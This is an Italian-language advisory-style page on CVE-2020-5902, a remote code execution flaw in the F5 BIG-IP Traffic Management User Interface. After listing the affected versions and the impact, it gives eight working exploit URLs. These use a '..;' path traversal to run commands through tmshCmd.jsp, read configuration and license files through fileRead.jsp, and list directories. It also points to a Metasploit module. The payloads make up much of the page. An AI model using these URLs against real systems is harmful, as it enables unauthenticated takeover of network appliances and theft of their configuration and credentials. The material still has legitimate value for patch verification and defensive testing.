
[CVE-2020-5902] F5 BIG-IP Esecuzione di codice in remoto (RCE)
[CVE-2020-5902] F5 BIG-IP Interfaccia utente di gestione del traffico (TMUI) - Esecuzione di codice in remoto
Nelle versioni BIG-IP 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 e 11.6.1-11.6.5.1, l'interfaccia utente di gestione del traffico (TMUI), nota anche come utilità di configurazione, presenta una vulnerabilità di esecuzione di codice in remoto (RCE) in pagine non divulgate.
Questa vulnerabilità consente ad aggressori non autenticati, o a utenti autenticati, con accesso di rete all'utilità di configurazione, attraverso la porta di gestione BIG-IP e/o gli IP self, di eseguire comandi di sistema arbitrari, creare o eliminare file, disabilitare servizi e/o eseguire codice Java arbitrario. Questa vulnerabilità può portare a una compromissione completa del sistema. Anche il sistema BIG-IP in modalità Appliance è vulnerabile. Questo problema non è esposto sul piano dati; solo il piano di controllo è interessato.
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release
https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/
L'avviso di sicurezza originale è stato pubblicato da F5 e puoi consultarlo qui
Inoltre, è disponibile un modulo metasploit per CVE-2020-5902 con valutazione Eccellente. Puoi trovare i codici Ruby del modulo metasploit per exploits/linux/http/f5_bigip_tmui_rce.rb